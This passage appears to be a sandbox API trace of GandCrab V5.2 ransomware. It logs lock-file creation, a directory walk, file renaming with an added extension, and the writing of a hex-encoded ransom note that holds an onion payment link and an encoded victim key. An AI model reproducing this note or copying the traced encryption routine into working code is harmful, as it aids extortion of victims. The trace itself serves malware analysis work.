6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.110] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.111] CloseHandle (hObject=0x230) returned 1 [0096.111] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.111] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.111] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x1aa)) [0096.111] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.111] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.111] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.112] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\d2ca4a09d2ca4deb61a.lock") returned 49 [0096.112] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\appdata\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.112] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.112] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.112] lstrlenW (lpString="C:\\Users\\Default\\AppData\\") returned 25 [0096.112] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\*") returned="C:\\Users\\Default\\AppData\\*" [0096.112] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\AppData\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x503378 [0096.112] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.113] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.113] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.113] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.113] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.113] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.113] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.113] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\AppData\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\AppData\\d2ca4a09d2ca4deb61a.lock" [0096.113] lstrlenW (lpString=".titwmvjl") returned 9 [0096.113] lstrlenW (lpString="C:\\Users\\Default\\AppData\\d2ca4a09d2ca4deb61a.lock") returned 49 [0096.114] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.114] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 58 [0096.114] lstrlenW (lpString="C:\\Users\\Default\\AppData\\d2ca4a09d2ca4deb61a.lock") returned 49 [0096.114] lstrlenW (lpString=".lock") returned 5 [0096.114] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.114] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.114] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.114] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.114] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.114] lstrcmpW (lpString1="Local", lpString2=".") returned 1 [0096.114] lstrcmpW (lpString1="Local", lpString2="..") returned 1 [0096.114] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="Local" | out: lpString1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0096.114] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\") returned="C:\\Users\\Default\\AppData\\Local\\" [0096.114] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.115] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.115] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.115] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.115] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.115] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.115] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.115] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.115] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.115] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.116] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.116] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\\\TITWMVJL-DECRYPT.txt") returned 52 [0096.116] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0096.116] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x